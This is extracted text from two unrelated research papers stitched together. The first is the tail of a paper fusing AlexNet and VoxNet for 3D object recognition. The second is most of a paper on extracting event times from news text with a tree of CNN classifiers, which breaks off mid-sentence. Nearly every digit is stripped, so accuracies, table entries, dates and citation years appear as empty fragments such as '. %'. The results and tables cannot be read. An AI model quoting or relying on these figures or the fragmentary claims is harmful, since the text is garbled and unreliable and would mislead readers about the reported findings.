  after the fusion is complete, we get a k-dimensional vector, where n is the number of categories. we take the largest element among them as the final sample tag. d. recognition results in order to test the accuracy of this experimental method, the method of this paper is compared with the recognition accuracy of voxnet and alexnet. the experimental results are shown in table . table i. accuracy of different methods recognition methods accuracy rate/% alexnet voxnet in this paper, the coefficients α and β before alexnet and voxnet are set to different values, the method with higher accuracy is used to set larger coefficients, the method with lower accuracy is set with smaller coefficients, and the comparison between different combinations of coefficients is international conference on sensor network and computer engineering (icsnce ) accurate for the network. influences. the experimental results are shown in table . table ii. effects of different combinations of coefficients on network accuracy weight( ) accuracy/% ( . , . ) . ( . , . ) . ( . , . ) ( . , . ) . ( . , . ) . from table , the network has the highest recognition rate when α and β are set to . and . . compare this method with the recognition accuracy of voxnet and alexnet. experimental results show that this method has the highest recognition rate. iv. conclusion this paper presents a decision-level three-dimensional target fusion algorithm, we using different convolutional neural network frameworks to extract point cloud features and visual features of three-dimensional objects, respectively, and finally achieved effective fusion. experimental results show that feature fusion in the decision-making layer is also an effective feature fusion method. this method improves the accuracy of object recognition. in the process of integration, a method with a higher recognition accuracy rate sets a larger coefficient, and a method with a low recognition accuracy rate sets a smaller coefficient, and the final accuracy rate is the highest. references [ ] z. wu, s. song, a. khosla, f. yu, l. zhang, x. tang and j. xiao. d shapenets: a deep representation for volumetric shapes. cvpr . [ ] krizhevsky a, sutskever i, hinton g e. imagenet classification with deep convolutional neural networks[c]// international conference on neural information processing systems. curran associates inc. : - . [ ] d. maturana and s. scherer. voxnet: a d convolutional neural network for real-time object recognition. iros . [ ] h. su, s. maji, e. kalogerakis, e. learned-miller. multi-view convolutional neural networks for d shape recognition. iccv . [ ] charles r. qi, hao su, kaichun mo, and leonidas j. guibas. pointnet: deep learning on point sets for d classification and segmentation. cvpr . [ ] z. xie, k. xu, w. shan, l. liu, y. xiong, h. huang, projective feature learning for d shapes with multiview depth images, in: computer graphics forum, vol. , wiley online library, , pp. – . [ ] z. zhu, x. wang, s. bai, c. yao, x. bai, deep learning representation using autoencoder for d shape retrieval, in: proceedings of the international conference on security, pattern analysis, and cybernetics(spac), ieee, , pp. – . [ ] holz d, holzer s, rusu r b, et al. real-time plane segmentation using rgb-d cameras[c]// robot soccer world cup xv. springer-verlag, : - . [ ] salih y, malik a s. comparison of stochastic filtering methods for d tracking[j]. pattern recognition, , ( – ): - . [ ] c. r. qi, h. su, m. nießner, a. dai, m. yan, and l. 
guibas.volumetric and multi-view cnns for object classification on d data. in proc. computer vision and pattern recognition (cvpr), ieee, . [ ] http://www.cnblogs.com/graphics/archive/ / / / .html the princeton modelnet. http://modelnet.cs. [ ] the princeton modelnet. http://modelnet.cs. [ ] r. b. girshick, j. donahue, t. darrell, and j. malik. rich feature hierarchies for accurate object detection and semantic segmentation. in proc. cvpr, . http:// dshapenets.cs.princeton.edu/ http:// dshapenets.cs.princeton.edu/ http://danielmaturana.net/extra/voxnet_maturana_scherer_iros .pdf http://danielmaturana.net/extra/voxnet_maturana_scherer_iros .pdf http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html http://people.cs.umass.edu/~kalo/papers/viewbasedcnn/index.html https://arxiv.org/abs/ . https://arxiv.org/abs/ . event time extraction with a decision tree of neural classifiers nils reimers†, nazanin dehghani‡∗, iryna gurevych† † ubiquitous knowledge processing lab (ukp) and research training group aiphes department of computer science, technische universität darmstadt ‡ school of electrical and computer engineering, university of tehran www.ukp.tu-darmstadt.de abstract extracting the information from text when an event happened is challenging. documents do not only report on current events, but also on past events as well as on future events. often, the relevant time information for an event is scattered across the document. in this paper we present a novel method to auto- matically anchor events in time. to our knowl- edge it is the first approach that takes tempo- ral information from the complete document into account. we created a decision tree that applies neural network based classifiers at its nodes. we use this tree to incrementally infer, in a stepwise manner, at which time frame an event happened. we evaluate the approach on the timebank-eventtime corpus (reimers et al., ) achieving an accuracy of . % com- pared to an inter-annotator agreement (iaa) of . %. for events that span over a single day we observe an accuracy improvement of . points compared to the state-of-the-art caevo system (chambers et al., ). without re- training, we apply this model to the semeval- task on automatic timeline generation and achieve an improvement of . points f -score compared to the state-of-the-art. our code is publically available. introduction knowing when an event happened is useful for a lot of use cases. examples are in the fields of time-aware information retrieval, text summarization, automated timeline generation, and automatic knowledge base population. many facts in a knowledge base are ∗during author’s internship in the research training group aiphes at ukp lab, tu darmstadt. https://github.com/ukplab/ tacl -event-time-extraction only true for a certain time period, for example the presidency of a person. hence, the population of a knowledge base can highly benefit from high quality event and event time extraction (surdeanu, ). inherent to events is the connection to time. allan ( ) defines an event as “something that happens at some specific time and place”. the challenges for automatic event time extraction are manifold. the temporal information in news articles which states when an event happened is, in most cases, not in the same or in neighboring sentences with the event (reimers et al., ). it can be mentioned far before the event or far after the event. even worse, for more than % of events, the specific day at which the event happened is not mentioned. 
however, from the world knowledge and causal relations, the reader can infer a lot of temporal information about those events and can often infer that the event happened before or after some specific point in time. in this paper we describe a new classifier for auto- matic event time extraction. we use the timebank- eventtime corpus (reimers et al., ) to train and evaluate our proposed architecture. in contrast to other corpora on temporal relations, the annota- tion of the timebank-eventtime corpus does not make restrictions where, and in which form, tempo- ral information for an event must be provided. the annotators were allowed to take the whole document into account and were asked to answer, to the best of their ability, the question at which date or time period the event happened. the event time annotation for some sample events is shown in the following: • he was [sent] - - into space on may , we will refer to the temporal information when an event happened as event time. transactions of the association for computational linguistics, vol. , pp. – , . action editor: patrick pantel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. . he [spent]endpoint = - - beginpoint= - - six days aboard the salyut spacecraft. • [...] two areas [expected]endpoint =before - - beginpoint=before - - to be hardest [hit]after - - before - - when the effects of the asian crisis [...]. this annotation imposes several challenges for an automatic approach: . the number of possible labels is infinite, as date values are part of the labels. . due to the diverse types of events and due to varying temporal information for events, the structure of the labels varies. . temporal information from the whole document must be taken into account. . for . % of the events, the event time label is a combination of several temporal clues. an example could be that the annotator combined that the person went missing on the th and that the person went missing in the month of august. however, nowhere in text is the th of august explicitly mentioned. the main contribution of this paper is the proposal of a novel combination of a decision tree combined with neural network classifiers for the nodes to solve the afore-mentioned challenges. to our knowledge, this is the first system that works on the complete document and can extract long-range relations be- tween events and temporal expressions. further, it is the first system that focuses on extracting begin and end points for events that span over multiple days. evaluated on the timebank-eventtime corpus (reimers et al., ), it achieves an accuracy of . % compared to an inter-annotator agreement (iaa) of . %. compared to the state-of-the-art caevo system (chambers et al., ), we observe a substantial improvement in accuracy of . per- centage points for events that happened on a single day. for multi-day events, we observe an accuracy of . % using a strict metric. we show that the proposed model generalizes well to new tasks and textual domains. we applied it without re-training to the semeval- task on automatic timeline generation. there, it achieves an improvement of . points f -score compared to the state-of-the-art. related work we start with a review on common annotation schemes to capture temporal information for events in documents. afterwards, we present related work on automatically extracting temporal information for events. . 
annotation of events and temporal information one of the most widely used specifications for events and temporal expressions is timeml (saurı́ et al., ). it provides specifications for the annotation of events, temporal expressions, and the temporal links (tlink). an event is defined as term for situations that happen or occur. temporal expressions, such as times, dates, or durations, are annotated and their temporal values are normalized using the definitions of ferro ( ). a tlink is the relation between two events, between an event and a temporal expres- sion, or between two temporal expressions. timeml defines different relation types, however, most corpora which are using the timeml specification restrict the number of relations to a smaller set. a prominent corpus using the timeml specifica- tions is the timebank corpus (pustejovsky et al., ), which was also the basis for the three shared tasks tempeval- (verhagen et al., ), tempeval- (verhagen et al., ) and tempeval- (uzzaman et al., ). a drawback of tlinks is the quadratic growth of possible tlinks with the number of events and tem- poral expressions, resulting in more than , pos- sible tlinks for several documents in the timebank corpus. as the annotation of such a large number of tlinks would be impractical, annotation of those is always restricted in some form. for the timebank corpus, only salient tlinks were annotated. which links are salient isn’t well defined and a low agree- ment between annotators can be observed. the three tempeval shared tasks tried to improve the coverage and added some further temporal links for mentions in the same sentence. more dense annotations were applied by bramsen et al. ( ), kolomiyets et al. ( ), do et al. ( ) and cassidy et al. ( ). while bramsen et al., kolomiyets et al., and do et al. only annotated some temporal links, cassidy et al. an- notated all event-event, event-time, and time-time pairs in the same sentence as well as in the directly succeeding sentence leading to the densest annota- tion for the timebank corpus. they used six differ- ent relation types: before, after, includes, is included, simultaneous, and vague, where vague encodes that the annotators were not able to make a statement on the temporal relation of the pair. . existent event time extraction systems most automatic approaches use the previously in- troduced tlinks to train and evaluate systems for extracting temporal information about events. for a new document, the system first extracts the temporal relations between events and temporal expressions. in a post-processing step, those tlinks are used to retrieve the information when an event happened. extracting the relations is often formulated as a pair-wise classification task. each pair of events and/or temporal expressions is examined and classi- fied according to the available relation classes. ensur- ing transitivity is a big challenge when formulating this task as a pair-wise classification task. one sim- ple but nonetheless frequently used solution is to automatically infer all temporal relations that can be derived from transitivity. some systems have tried to take advantage of global information to ensure transi- tivity using markov logical networks or integer linear programming (bramsen et al., ; chambers and jurafsky, ; yoshikawa et al., ; uzzaman and allen, ). however, the gains were minor. chambers et al. ( ) proposes the caevo- system, a sieve-based-architecture that blends mul- tiple classifiers into a precision-ranked cascade of sieves. 
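as an aside, the transitivity inference mentioned above (deriving, for example, before(a, c) from before(a, b) and before(b, c)) can be sketched as a simple fixed-point computation; the pair representation here is an invented simplification, not the encoding used by any of the cited systems.

```python
def transitive_closure(before_pairs):
    """derive every BEFORE relation implied by transitivity from an initial set of pairs."""
    closure = set(before_pairs)
    changed = True
    while changed:
        changed = False
        for a, b in list(closure):
            for c, d in list(closure):
                if b == c and (a, d) not in closure:
                    closure.add((a, d))
                    changed = True
    return closure

# event e1 before time t1, t1 before event e2  =>  e1 before e2 is added automatically
print(transitive_closure({("e1", "t1"), ("t1", "e2")}))
```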
the system was trained and evaluated on the timebank-dense corpus and created a dense tlink annotation for all pairs of events and/or temporal ex- pressions in the same and in adjacent sentences. the code is publically available. a bottleneck of current systems is the limitation to tlinks for pairs that are in the same or in adjacent sentences. according to reimers et al. ( ) . % of the events happen at the document creation time (dct). for the remaining . % of events, the event time must be inferred via tlinks. however, for http://www.usna.edu/users/cs/nchamber/ caevo/ . % of those events the most informative time ex- pression is not in the same nor in the previous/next sentence. in conclusion, for . % of all the events in a text it would be necessary to take long-range tlinks into account to correctly retrieve the event time. extending existing systems to take long-range relations into account is difficult due to a lack of training and evaluation data. event time annotation we use the timebank-eventtime corpus (reimers et al., ) to evaluate our architecture for automatic event time extraction. the timebank-eventtime corpus does not use the concept of tlinks, instead, for every event, the annotators were asked to anchor the event in time as precisely as possible. the annotation distinguishes between events that happened on a single day and multi-day events that span over multiple days. for single day events, the annotators provide the day the event happened in the format yyyy-mm-dd. in the case the exact date is not mentioned in the document, the annotators were asked to anchor the event in time as precisely as possible using the annotation before yyyy-mm-dd and after yyyy-mm-dd. before notes that the event must have happened before the stated date and after that the event must have happened after the date. a combination of before and after is possible. for multi-day events, the annotators were asked to provide the begin and the end point of the event. as for single day events, they were allowed to use the before and after notation in the case the explicit begin/end point is not mentioned in the document. the annotated corpus contains news articles and tv broadcast transcripts from various sources written mainly between january and april . the shortest document has five sentences, while the longest has sentences. a label distribution can be found in (reimers et al., ). automatic event time extraction in this section we first present our hierarchical tree approach to automatically infer the event times in the most informative temporal expression is defined as the temporal expression giving the reader the information at which date, or in which time frame, the event happened. a document. in section . we present two base- lines that we use for comparison: the first uses dense tlinks extracted by the caevo system and the second baseline is a reduced version of the presented tree approach. . event time extraction using trees we use the tree structure depicted in figure to extract the event time for a given target event. the structure was inspired by how annotators labeled the data. when annotating the text, the first decision is typically whether the event is a single day event or a multi-day event. in the case that it is a single day event, the next question is whether the event happened at the document creation time (dct) or not. as the annotated data comes from the news domain, a large set of events ( . % of the single day events) happened at the document creation time. 
in the case the event did not happen at dct, then the annotator scanned the text to decide whether the date when the event happened is explicitly mentioned or not. if it is not mentioned, the annotator used the before and after notation to define the time frame when the event happened as precisely as possible. for multi-day events, the process is similar to determine the begin and end point of the event. the first classifier is a binary classifier to decide whether the event is a single or a multi-day event. in the case it is a single day event, the next classifier decides the relation between the event and the doc- ument creation time (dct). in the case the event happened at dct, the architecture stops. if the event happened before or after dct, the next classifier is invoked, detecting which temporal expressions are relevant. for all relevant temporal expressions, it is then determined whether the event happened simul- taneously, before, or after the temporal expressions. the final step ( . ) outputs a single event time by narrowing down the information it receives from the relation to dct ( . ) and the pool of relevant tempo- ral expressions and relations ( . ). for multi-day events the process is similar, how- ever, the system must return the begin and the end points. the system runs three processes in parallel: it extracts the relations to relevant time expressions for the begin point ( . . and . . ); it extracts the relation to dct ( . ) and; it extracts the relations to relevant time expressions for the end point ( . . and . . ). there are three possible relations between a multi-day event and the dct: the event started and ended before the dct; it started and ended after the dct; or it started before dct and ended after dct. this information is taken into account in step . . and . . when producing single begin point and end point information for the given event. . local classifiers this section describes the different local classifiers applied in our tree structure. for all except the nar- row down classifier, we used the convolutional neu- ral networks architecture (lecun, ) depicted in figure . the narrow down classifier is a sim- ple, hand-crafted, rule-based classifier described in section . . . . . neural network architecture we use the same neural network architecture with slightly different configurations for the different local classifiers. the architecture is depicted in figure and is described in the following sections. the neural network architecture is based on the design proposed by zeng et al. ( ), which can achieve state-of-the-art performance on relation clas- sification tasks (zeng et al., ; dos santos et al., ). the neural network applies a convolution over the word representations and position embeddings of the input text followed by a max-over-time pooling layer. we call the output of this layer input text fea- tures. those input text features are merged with the word embedding for the event and time expression token. the merged input is fed into a hidden layer using either the hyperbolic tangent tanh(·) or a rec- tified linear unit (relu) as activation function. the choice of the activation function is a hyperparameter and was optimized on a development set. the final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer. to avoid overfitting, we used two dropout layers (srivastava et al., ), the first before the dense hidden layer and the second after the dense hidden layer. 
the percent- ages of the dropouts were set as hyperparameters. word embeddings. we used the pre-trained word embeddings presented by levy and goldberg ( ). the embedding layer of our neural networks maps each token from the input text to their respec- tive word embedding. out-of-vocabulary tokens are figure : tree structure used to extract the temporal information for an event. rectangles are local classifiers based on deep convolutional neural networks except for the narrow down rectangles, which are simple rule based classifiers. figure : the neural network architecture used for the different local classifiers. replaced with a special unknown token, for which the word embedding was randomly initialized. position embeddings. collobert et al. ( ) pro- poses the use of position embeddings to keep track how close words in the input text are to certain tar- get words. for each input text, we specify certain words as targets. for example, we specify the event and the temporal expression as target words and train the network to learn the temporal relation between those. each word in the input text is then augmented with the relative distances. let pos , pos , ... be the positions of the target words in the input text. then, a word at position j is augmented with the features j −pos , j −pos , · · · . these augmented position features are then mapped in the embedding layer to a randomly initialized vector. the dimension of this vector is a hyperparameter of the network. the word embeddings and the position embed- dings are concatenated to form the input for the con- volutional layer. in the case of two target words, the input for the convolutional layer would be: emboutput = {[wew ,pe −pos ,pe −pos ], [wew , pe −pos ,p −pos ], ..., [wewn,pen−pos ,pen−pos ]} with wewj the embedding of the j-th word in the input text, pej−posk the embedding for the distance between the j-th word and the target word k. convolutional & max-over-time layer. a challenge for the classifier is the variable length of the input text and that important information can be anywhere in the input text. to tackle this issue, we use a convolutional layer to compute a distributed vector representation of the input text. let us define a vector xk as the concatenation of the word and po- sition embeddings for the position k as well as for m positions to the left and to the right: xk = ([we wk−m,pek−m−pos ,pek−m−pos ]||...|| [wewk,pek−pos ,pek−pos ]||...|| [wewk+m,pek+m−pos ,pek+m−pos ]) the convolutional layer multiplies all xk by a weight matrix w and applies the activation func- tion component-wise. after that, a max-over-time is applied, i.e., the max-function is applied component- wise. the j-th entry of the convolutional and max- over-time layer output is defined as: [convoutput]j = max ≤k≤n [tanh(w xk)]j lexical features. previous approaches heavily rely on lexical features. for example, the caevo system (chambers et al., ) uses, for the classifi- cation of event-time edges, the token, the lemma, the pos tag, the tense , the grammatical aspect and the class of event as well as the parse tree between event and time expression. in our evaluation, we did not observe that these features have a significant impact on the performance. hence, we decided to use the event and time tokens as the only features besides the dense vector representation of the input text. for multi-token expressions, we only use the first token. 
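to make the preceding description more concrete, the following keras sketch assembles a classifier in the spirit of this architecture: word and position embeddings are concatenated, passed through a convolution with max-over-time pooling, merged with the embeddings of the event and time tokens, and fed through a dropout, dense, dropout block into a softmax output. all layer sizes, the dropout rate, and the two-distance encoding are illustrative assumptions; they are not the hyperparameters or the implementation used in the paper.

```python
import tensorflow as tf
from tensorflow.keras import layers, Model

# hypothetical sizes; the actual values were tuned on a development set
VOCAB, POS_RANGE, WORD_DIM, POS_DIM, FILTERS, WINDOW, CLASSES = 10000, 200, 300, 10, 150, 3, 3

def build_relation_classifier():
    tokens  = layers.Input(shape=(None,), dtype="int32", name="tokens")
    dist_ev = layers.Input(shape=(None,), dtype="int32", name="dist_to_event")
    dist_tx = layers.Input(shape=(None,), dtype="int32", name="dist_to_timex")
    targets = layers.Input(shape=(2,), dtype="int32", name="event_and_timex_tokens")

    word_emb  = layers.Embedding(VOCAB, WORD_DIM, name="word_embeddings")
    pos_emb_e = layers.Embedding(POS_RANGE, POS_DIM)   # relative distance to the event token
    pos_emb_t = layers.Embedding(POS_RANGE, POS_DIM)   # relative distance to the time expression

    x = layers.Concatenate()([word_emb(tokens), pos_emb_e(dist_ev), pos_emb_t(dist_tx)])
    x = layers.Conv1D(FILTERS, WINDOW, activation="tanh")(x)    # convolution over the input text
    x = layers.GlobalMaxPooling1D()(x)                          # max-over-time pooling

    target_feats = layers.Flatten()(word_emb(targets))          # embeddings of event / timex tokens
    merged = layers.Concatenate()([x, target_feats])
    merged = layers.Dropout(0.3)(merged)                        # dropout rate is a hyperparameter
    hidden = layers.Dense(100, activation="relu")(merged)       # tanh or relu, chosen on the dev set
    hidden = layers.Dropout(0.3)(hidden)
    output = layers.Dense(CLASSES, activation="softmax")(hidden)  # or a single sigmoid unit

    return Model([tokens, dist_ev, dist_tx, targets], output)

model = build_relation_classifier()
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy")
```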
our architecture focuses on extracting the event time when event annotations and temporal expressions are provided. in order to evaluate the accuracy of this isolated step, we decided to use the provided annotations in the corpus. the baselines we defined tenses: simple, perfect, and progressive defined aspects in timebank: past, present, future defined classes in timebank: occurrence, perception, re- porting, aspectual, state, i state, i action compared against use these gold annotations as well. output. the distributed vector representation of the input text and the embeddings of event/time token are concatenated and passed through a dense layer. as the activation function, we allowed either the hy- perbolic tangent or the rectified linear unit (relu). the choice is a parameter of the network. the final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer to compute the probabilities of the different tags. . . single vs. multi-day event classification the first local classifier, that decides whether an event is a single day event or a multi-day event, uses the event word as the target word. . . dct classification a single day event can happen either before the document was created (before-class), on the same day (simultaneous-class), or it will hap- pen at least one day after the document was created (after-class). the configuration of this local clas- sifier is as in the previous section. note, to classify the relation to the dct, in most cases, it was not important to know the concrete document creation time. therefore, we did not pass the dct as a value to the network. for multi-day events, we decided to group the events into three categories: first, events that be- gan and ended before the document creation time (before-class); second, events that began before dct and ended after dct (includes-class); and third, events that will begin and end after dct (after-class). . . detecting relevant time expressions in the case the event did not happen at the dct, it is important to take the surrounding text and po- tentially the whole document into account to figure out at which date the event happened. for our classi- fier, we assume that temporal expressions are already detected in the document. to detect temporal ex- pressions, tools like heideltime can be used that achieve an f -score of . on extracting temporal expressions in the timebank corpus (strötgen and gertz, ). https://github.com/heideltime as an intermediate step to detect when an event happened, we first decide whether the temporal ex- pression is relevant for the event or not. we define a temporal expression to be relevant, if the (normal- ized) value of the temporal expression is part of the event time annotation. the value of the temporal ex- pression can either be the event time, or it can appear in the before or after notation. the classifier is executed for all event and temporal expression pairs. the input text for the distributed text representation is the text between the event and the temporal expression. . . temporal relation classification given the relevant temporal expression for an event from the previous step, the next local classi- fier establishes the temporal relation between the event and the temporal expression. for a given, relevant event-temporal expression pair, it outputs before - when the event happened before the tem- poral expression, after - when it happened after, or simultaneous - when it happened on the men- tioned date. 
this local classifier has the same configu- ration as the network used to detect relevant temporal expression. . . narrow down classifier the goal of the narrow down classifier, that is used in step . , . . and . . in figure , is to derive the final label given the information on the rel- evant temporal expressions, their relation to the event, and the relation to the document creation time. for most events in the corpus, this information was un- ambiguous, e.g., only one temporal expression was classified as relevant for the event. the proposed approach returns multiple relevant temporal expres- sions only for a small fraction of events. however, this number was too small to train and to validate a learning algorithm for this stage. hence, we decided to implement a straightforward, rule-based classifier. this classifier is depicted in algorithm . it takes all relations to relevant temporal expres- sions as well as the relation to the document cre- ation time to derive the final output. in the case a simultaneous relation exists, the classifier stops and the appropriate temporal expression is used as event time. if no such relation exists, a frequency distribution of the linked dates and relations is cre- ated for before as well as for after relations. for example, when the system extracts three relevant before relations of different mentions of date throughout the text and two relevant before rela- tions of different mentions of date , then the sys- tem would choose date as a slot-filler for the be- fore property. if there are as many relevant before relations for date as for date , the system will choose the lowest date for the before property (line - ). for after relations, we use the same logic, except that we choose the largest date (line ). algorithm narrow down classifier : function narrowdown(times) : fd before, fd after = freqdistribution() : for [relation, time] in times do : if relation is simultaneous then : return time : else if relation is before then : fd before.new sample(time) : else if relation is after then : fd after.new sample(time) : end if : end for : //fd before elements have the fields .num=#samples and .time=time value : if fd before.size > then : // find the largest number of samples of a time : max samples = fd before.max( .num) : //take minimum over all times having max samples : before time = fd before.filter( .num == max samples).min( .time) : end if : if fd after.size > then : // find the largest number of samples of a time : max samples = fd after.max( .num) : //take maximum over all times having max samples : after time = fd after.filter( .num == max samples).max( .time) : end if : return after + after time + before + before time : end function . baseline we use two baselines to compare our system. as the first baseline, we use the system presented in reimers et al. ( ). the baseline is based on the multi-pass architecture caevo introduced by cham- bers et al. ( ) and extracts all tlinks between event mentions and temporal expressions. the sys- tem by chambers et al. applies multiple rules and trained classifiers to extract those tlinks. the dif- ferent stages are ranked by precision and are executed consecutively. a shortcoming of the system is that it does not produce temporal information if an event lasted for more than a day. hence, the system cannot be used to distinguish between single day and multi- day events, nor can it extract the begin/end points for multi-day events. 
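for concreteness, the following is a plain-python rendering of the narrow down procedure listed in the algorithm above; it assumes the relations arrive as (relation, date) tuples with iso-formatted date strings, and the dates in the usage line are invented for illustration. the same post-processing step is reused by the baseline described next.

```python
from collections import Counter

def narrow_down(relations):
    """relations: list of (relation, date) tuples, relation in {"simultaneous", "before", "after"}.
    returns the final event-time label, mirroring the rule-based procedure above."""
    before, after = Counter(), Counter()
    for relation, date in relations:
        if relation == "simultaneous":
            return date                      # an exact date wins immediately
        elif relation == "before":
            before[date] += 1
        elif relation == "after":
            after[date] += 1

    label = []
    if after:
        top = max(after.values())            # most frequently linked dates
        label.append("after " + max(d for d, c in after.items() if c == top))
    if before:
        top = max(before.values())
        label.append("before " + min(d for d, c in before.items() if c == top))
    return " ".join(label)

# iso-formatted dates compare correctly as strings
print(narrow_down([("before", "1998-03-05"), ("before", "1998-03-05"), ("after", "1998-02-01")]))
# -> "after 1998-02-01 before 1998-03-05"
```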
our previously presented baseline uses the ex- tracted relations for single day events and gener- ates a set of <relation, time> tuples in which the event is involved. we use the narrow down classifier from section . . to extract the final label. when all extracted relations are of type vague, the baseline returns that it cannot infer the time for the event. the second baseline is a reduced version of the hierarchical tree. for this baseline, we first apply the classifier to decide whether it is a single day or multi-day event. when it is a single day event, we classify the relation to the document creation time (dct) (classifier . ). when the event did not happen at dct, we link it to the closest temporal expression in the document. for multi-day events, we only run the classifier . to extract the relation to dct. when the event happened before dct, we set the begin and end point to before dct; when it happened after dct, we set both to after dct; and, when the relation was includes, we set the begin point to before dct and the end point to after dct. experimental setup we conduct our experiments on the timebank- eventtime corpus (reimers et al., ). the corpus is comprised of documents and annotated events. we use the same split into training, develop- ment, and test set as chambers et al. ( ) resulting in documents for training, documents for hyper- parameter optimization, and documents for the final evaluation. using this split allows a fair comparison to the caevo system. hyperparameters for the individual local classi- fiers were chosen using random search (bergstra and bengio, ) with at least iterations per local classifier. experimental results we evaluate our system using two different metrics. the strict metric requires an exact match between the predicted label and the gold label. a disadvantage of this metric is that it does not allow partial agree- ment. the strict agreement between two annotators is fairly low for events where the exact date of the event was not mentioned. in order to allow partial matches, we will also use a relaxed metric, which will judge two different la- bels only as an error, if those are mutually exclusive. two labels are mutually exclusive, if there is no event date which could satisfy both labels at the same time. if the event happened on august th, , the two annotations before - - and after - - before - - would both be satisfied. there- fore, these two different labels would be considered as correct. in contrast, the two annotations after - - and before - - can never be satisfied at the same time and are therefore mutually exclusive. the score of the relaxed metric must be seen in combination with the strict metric. a system could trick the relaxed metric by returning a before date that is far in the future which results in a high relaxed score but a negligible strict score. future research is necessary to judge the quality of different kind of partial matches and to design an appropriate metric. . system performance following the recommendations in (reimers and gurevych, ), we train the system with dif- ferent random seed values, and compute the mean performance score and the standard deviation. table shows the results in comparison to the observed inter-annotator agreement (iaa). the inter-annotator agreement is based on two full annotations of the cor- pus. the chance-corrected agreement is α = . using krippendorff’s α (krippendorff, ). 
the two annotations were merged into a final gold label annotation of the corpus, which we used for training and evaluation. the accuracy to distinguish between single day and multi-day events is . % on the test set, in comparison to an inter-annotator agreement of . %. the overall performance is . %, compared to an iaa of . % using the strict metric. for multi-day events, we observe an accuracy with the strict metric of . %, compared to an iaa of . %. breaking it down to the begin- and end- point extraction, we observe a much lower accuracy for the begin point extraction of just . %, com- system iaa single vs. multi-day . % ± . . % single day (strict) . % ± . . % single day (relaxed) . % ± . . % multi-day (strict) . % ± . . % begin (strict) . % ± . . % end (strict) . % ± . . % multi-day (relaxed) . % ± . . % begin (relaxed) . % ± . . % end (relaxed) . % ± . . % overall acc. (strict) . % ± . . % overall acc. (relaxed) . % ± . . % table : accuracy for the different stages of our system in comparison to the observed inter-annotator agreement (iaa). the strict metric requires an exact match between the labels. the relaxed metric requires that the two anno- tations are not mutually exclusive. pared to . % accuracy for the end point extraction. however, using the relaxed metric, we see an accu- racy of . % for the begin point and . % for the end point. we can conclude that the extraction of the begin point works well, however, in a large set of cases ( . %) the extracted begin point is less precise than the gold annotation. the baseline based on the caevo system from chambers et al. ( ) can only be applied to single day events, as tlink types that define the start or the end of an event do not exist. we ran this baseline on all events that were correctly identified as single day events. the performance of this baseline is depicted in table . for the proposed approach we observe a performance increase from . % to . %. for . % of the events, the retrieved label of the proposed approach was less precise than the gold label. an example of a less precise label would be before - - while the gold label was before - - . a clear wrong label was observed for . % of the generated labels. a big disadvantage of a dense tlink annotation is the restriction of tlinks for events and temporal expression that are in the same, or in adjacent, sen- tences. for . % of the events, the baseline was not able to infer any event time information. as our sys- tem outputs a label for every event, we see a slightly increased number of wrong labels in comparison to the baseline. single day events ours caevo exact match . % . % less precise . % . % wrong label . % . % cannot infer time - . % table : distribution of the retrieved labels for the pro- posed system and for the baseline. less precise are labels where the time frame when the event has happened is larger than for the gold label. wrong label are labels which are in clear contradiction to the gold standard. table compares the proposed system against the reduced tree that only classifies the type of the event (single day or multi-day) and the relation to the doc- ument creation time. we observe a significant drop in accuracy for single day events, indicating that just classifying the relation to the document creation time is insufficient for this task. system sd md overall full system . % . % . % reduced tree . % . % . % caevo . % - . % table : comparison of the accuracy (strict metric) for single day events (sd), multi-day events (md) and overall. 
reduced tree uses only the local classifiers , . and . . . error analysis error propagation is an important factor in a decision tree. table depicts the accuracy of the different local classifiers. we compare those to a majority vote baseline. for all local classifiers we can see a large performance increase over the baseline. we observe the lowest accuracy for the classifiers of the begin point ( . . . and . . .). this is in line with the previous observation of the low accuracy for begin point labels as well as with the low iaa for begin point annotations. the root classifier, which decides whether the event is a single day or a multi-day event, is the most critical classifier. this classifier is responsible for . % of the erroneously labeled events. how- ever, with an accuracy of . % it is already fairly close to the iaa of . % and it is unclear if this classifier could substantially be improved. system majority vote . event type . % . % single day event . . dct rel. . % . % . . relevant . % . % . . relation . % . % multi-day event . . begin point . . . relevant . % . % . . . relation . % . % . . dct rel. . % . % . . end point . . . relevant . % . % . . . relation . % . % table : accuracy for the different local classifiers vs. a majority vote baseline. local classifiers are numbered as depicted in figure . as mentioned in the introduction, the annotators were not restricted to the dates that are explicitly mentioned in the document but could also create new dates. for example, in the sentence it’s the [second day]date: - - of an [offensive]beginpoint= - - ... it is clear for the annotator that the offensive started on - - . however, this date is not explicitly mentioned in the text, only the date - - is mentioned. we call such dates out-of-document dates. handling those cases is extremely difficult and our system is currently not capable of creating such out- of-document dates. table depicts the error rate introduced by those dates. as the table depicts, . % of the event time labels are affected by out-of-document dates. an especially high percentage of such dates is observed for the be- gin point of multi-day events. in a lot of these cases the document states either an explicit or a rough esti- mation on the duration of the event. in the previous example, the text stated that the offensive already lasted for two days. in another example, the docu- ment gives the information that the event started in recent years or that it lasted for roughly / years. . ablation test table presents the changes in accuracy in per- centage points when individual components of the proposed system are changed. we observe a slight out-of-document dates single day events . % multi-day events . % begin point . % end point . % overall . % table : percentage of labels in the test set affected by out-of-document dates. drop of - . percentage points if bidirectional lstm- networks with recurrent units are used instead of convolutional neural networks. lstm-networks showed for other nlp tasks state-of-the-art perfor- mance, however, for this task they were not able to improve the performance. one reason could be the comparably small training set of documents. a further disadvantage of the bilstm-networks was the significantly longer training time, prohibiting run- ning an extensive hyperparameter tuning. configuration accuracy full system . % bilstm instead of cnn - . rnd. word embeddings - . no input text feature - . no position feature - . no narrow down - . 
table : change in accuracy (strict metric) in percent- age points when replacing individual components of the architecture. an important factor for the performance was the pre-trained word embeddings. replacing those with randomly initialized embeddings decreased the per- formance by - . percentage points. as before, we think this is due to the small training size. a large number of test tokens do not appear in the training set and several tokens only appear infrequently in the training set. hence, the network is not able to learn meaningful representations for those words. our system successfully uses the text between the event and the temporal expression (input text fea- tures) for classifying the relation between those. re- moving this part of the architecture decreases the ac- curacy by - . percentage points. further, it appears that not only the token itself, but also the position of the token relative to the event / time token is taken into account. removing this position information from the input text feature reduces the performance by - . percentage points. replacing the narrow down classifier with a classi- fier that randomly selects one of the relevant temporal expressions reduces the performance by only - . per- centage points. for most events, there was only one relevant temporal expression extracted. we analyzed the parameter settings for the top five performing lo- cal classifiers for each stage. the activation function (tanh and relu) appears to have a negligible impact on 